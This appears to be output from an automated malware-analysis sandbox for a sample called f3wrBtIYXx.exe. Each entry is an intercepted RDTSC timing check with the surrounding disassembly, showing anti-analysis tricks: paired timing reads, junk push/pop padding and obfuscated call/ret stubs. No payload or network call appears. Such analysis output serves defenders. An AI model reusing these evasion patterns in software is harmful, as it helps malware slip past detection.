Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8EB33E second address: 8EB349 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F5F64D1DAB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8ECD18 second address: 8ECD1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8EF1B2 second address: 8EF1C0 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5F64D1DAB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8EF1C0 second address: 8EF1E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007F5F64D1DF2Eh 0x00000010 jmp 00007F5F64D1DF28h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8F1E8F second address: 8F1E94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8F1E94 second address: 8F1EB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jl 00007F5F64D1DF18h 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 js 00007F5F64D1DF16h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8F1EB5 second address: 8F1F1F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007F5F64D1DAB8h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 mov dword ptr [ebp+1245ED66h], edi 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push edi 0x0000002d call 00007F5F64D1DAB8h 0x00000032 pop edi 0x00000033 mov dword ptr [esp+04h], edi 0x00000037 add dword ptr [esp+04h], 0000001Dh 0x0000003f inc edi 0x00000040 push edi 0x00000041 ret 0x00000042 pop edi 0x00000043 ret 0x00000044 mov edi, esi 0x00000046 stc 0x00000047 push 00000000h 0x00000049 mov ebx, dword ptr [ebp+122D29EBh] 0x0000004f xchg eax, esi 0x00000050 push edi 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8F1F1F second address: 8F1F23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8F1F23 second address: 8F1F27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8F2DB9 second address: 8F2DBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8F2DBD second address: 8F2DCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8F2DCB second address: 8F2DCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8F2DCF second address: 8F2DD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8F2DD5 second address: 8F2E4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F5F64D1DF18h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push ebp 0x00000029 call 00007F5F64D1DF18h 0x0000002e pop ebp 0x0000002f mov dword ptr [esp+04h], ebp 0x00000033 add dword ptr [esp+04h], 00000014h 0x0000003b inc ebp 0x0000003c push ebp 0x0000003d ret 0x0000003e pop ebp 0x0000003f ret 0x00000040 jmp 00007F5F64D1DF1Dh 0x00000045 push 00000000h 0x00000047 mov di, si 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d push ecx 0x0000004e jp 00007F5F64D1DF16h 0x00000054 pop ecx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8F3D7E second address: 8F3DB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F5F64D1DAB6h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push esi 0x0000000e je 00007F5F64D1DAB8h 0x00000014 pushad 0x00000015 popad 0x00000016 pop esi 0x00000017 nop 0x00000018 pushad 0x00000019 mov dword ptr [ebp+122D1B00h], esi 0x0000001f clc 0x00000020 popad 0x00000021 push 00000000h 0x00000023 xor dword ptr [ebp+12483267h], eax 0x00000029 push 00000000h 0x0000002b movsx ebx, ax 0x0000002e push eax 0x0000002f jo 00007F5F64D1DACDh 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8F5DA4 second address: 8F5DAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8F5DAD second address: 8F5DB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8F5DB8 second address: 8F5DBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8B06C5 second address: 8B06D6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F5F64D1DAB8h 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8B06D6 second address: 8B06E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8B06E1 second address: 8B06E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8B06E5 second address: 8B06FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jp 00007F5F64D1DF16h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jg 00007F5F64D1DF16h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8F631C second address: 8F6395 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5F64D1DACFh 0x00000008 jmp 00007F5F64D1DAC9h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 je 00007F5F64D1DABCh 0x00000016 mov dword ptr [ebp+12450B5Eh], edx 0x0000001c push 00000000h 0x0000001e add dword ptr [ebp+122D3055h], eax 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push edx 0x00000029 call 00007F5F64D1DAB8h 0x0000002e pop edx 0x0000002f mov dword ptr [esp+04h], edx 0x00000033 add dword ptr [esp+04h], 0000001Ch 0x0000003b inc edx 0x0000003c push edx 0x0000003d ret 0x0000003e pop edx 0x0000003f ret 0x00000040 mov ebx, edi 0x00000042 xchg eax, esi 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 jmp 00007F5F64D1DAC2h 0x0000004b push eax 0x0000004c pop eax 0x0000004d popad 0x0000004e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8F6395 second address: 8F639B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8F639B second address: 8F639F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8F8390 second address: 8F8396 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8F7633 second address: 8F7638 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8F84FB second address: 8F8501 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8F8501 second address: 8F8586 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DABBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jc 00007F5F64D1DAC4h 0x00000012 jmp 00007F5F64D1DABEh 0x00000017 nop 0x00000018 push 00000000h 0x0000001a push ecx 0x0000001b call 00007F5F64D1DAB8h 0x00000020 pop ecx 0x00000021 mov dword ptr [esp+04h], ecx 0x00000025 add dword ptr [esp+04h], 0000001Ah 0x0000002d inc ecx 0x0000002e push ecx 0x0000002f ret 0x00000030 pop ecx 0x00000031 ret 0x00000032 mov bx, dx 0x00000035 push dword ptr fs:[00000000h] 0x0000003c push edi 0x0000003d movsx edi, ax 0x00000040 pop edi 0x00000041 mov dword ptr fs:[00000000h], esp 0x00000048 mov edi, ecx 0x0000004a mov eax, dword ptr [ebp+122D13C1h] 0x00000050 add bl, 00000032h 0x00000053 push FFFFFFFFh 0x00000055 mov dword ptr [ebp+122D1878h], eax 0x0000005b nop 0x0000005c jc 00007F5F64D1DAC8h 0x00000062 push eax 0x00000063 push edx 0x00000064 jmp 00007F5F64D1DABAh 0x00000069 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8F8586 second address: 8F85A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007F5F64D1DF27h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8FA405 second address: 8FA409 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8FA409 second address: 8FA42A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5F64D1DF29h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8A32C1 second address: 8A32C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8A32C5 second address: 8A3307 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5F64D1DF16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jmp 00007F5F64D1DF27h 0x00000010 jmp 00007F5F64D1DF1Ch 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F5F64D1DF1Fh 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8FDAEF second address: 8FDAF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8FFA36 second address: 8FFA40 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 900A67 second address: 900A6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8FDCFE second address: 8FDD02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 901B64 second address: 901B7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5F64D1DAC5h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 901B7E second address: 901BDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F5F64D1DF18h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 mov bh, 08h 0x00000026 push 00000000h 0x00000028 add edi, dword ptr [ebp+122D19D0h] 0x0000002e push 00000000h 0x00000030 or ebx, 0894BF9Bh 0x00000036 xchg eax, esi 0x00000037 jmp 00007F5F64D1DF1Fh 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 je 00007F5F64D1DF16h 0x00000046 jnp 00007F5F64D1DF16h 0x0000004c popad 0x0000004d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8FFC4C second address: 8FFC5E instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5F64D1DAB8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8FFC5E second address: 8FFC68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8FFC68 second address: 8FFC6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 902C4A second address: 902C4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 902C4E second address: 902C54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 902C54 second address: 902C5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 901D78 second address: 901D9C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F5F64D1DAC3h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F5F64D1DAB8h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 901EBB second address: 901EC1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 903ADD second address: 903AE2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 903AE2 second address: 903AEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ecx 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 90E15E second address: 90E164 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 90D879 second address: 90D8AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edx 0x00000006 jg 00007F5F64D1DF16h 0x0000000c pop edx 0x0000000d popad 0x0000000e pushad 0x0000000f push ecx 0x00000010 pushad 0x00000011 popad 0x00000012 jo 00007F5F64D1DF16h 0x00000018 pop ecx 0x00000019 push edi 0x0000001a pushad 0x0000001b popad 0x0000001c pop edi 0x0000001d jng 00007F5F64D1DF28h 0x00000023 jmp 00007F5F64D1DF1Ch 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 90D9E8 second address: 90D9EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 90D9EC second address: 90D9F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 90D9F6 second address: 90D9FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 90DCDE second address: 90DCE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 9110F7 second address: 9110FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 93AA1D second address: 93AA21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 93AB53 second address: 93AB7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jnc 00007F5F64D1DAB6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F5F64D1DAC9h 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 93AB7D second address: 93AB91 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F5F64D1DF1Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 93ACDC second address: 93ACE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 93ACE0 second address: 93ACE8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 93ACE8 second address: 93AD1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 push eax 0x00000009 jnl 00007F5F64D1DAB6h 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F5F64D1DABBh 0x00000019 jmp 00007F5F64D1DAC3h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 93AD1A second address: 93AD4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5F64D1DF25h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F5F64D1DF22h 0x0000000f popad 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 93B140 second address: 93B14E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5F64D1DABAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 93FC95 second address: 93FC99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 93FC99 second address: 93FCA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 93FCA3 second address: 93FCA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 93FE2D second address: 93FE35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 93FE35 second address: 93FE39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 93FFA6 second address: 93FFAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 93FFAC second address: 93FFB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 93FFB0 second address: 93FFB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8E7DF3 second address: 8E7DF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8E7DF8 second address: 8E7E77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DAC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007F5F64D1DAB8h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 push edi 0x00000027 pop ecx 0x00000028 clc 0x00000029 mov ebx, dword ptr [ebp+1247BD6Fh] 0x0000002f push 00000000h 0x00000031 push ebx 0x00000032 call 00007F5F64D1DAB8h 0x00000037 pop ebx 0x00000038 mov dword ptr [esp+04h], ebx 0x0000003c add dword ptr [esp+04h], 00000016h 0x00000044 inc ebx 0x00000045 push ebx 0x00000046 ret 0x00000047 pop ebx 0x00000048 ret 0x00000049 mov edi, dword ptr [ebp+122D2BB3h] 0x0000004f mov dx, 9B71h 0x00000053 add eax, ebx 0x00000055 push edx 0x00000056 adc ch, FFFFFF80h 0x00000059 pop ecx 0x0000005a nop 0x0000005b push edi 0x0000005c pushad 0x0000005d pushad 0x0000005e popad 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8E7E77 second address: 8E7E84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8E7E84 second address: 8E7E8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F5F64D1DAB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 94433A second address: 944342 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
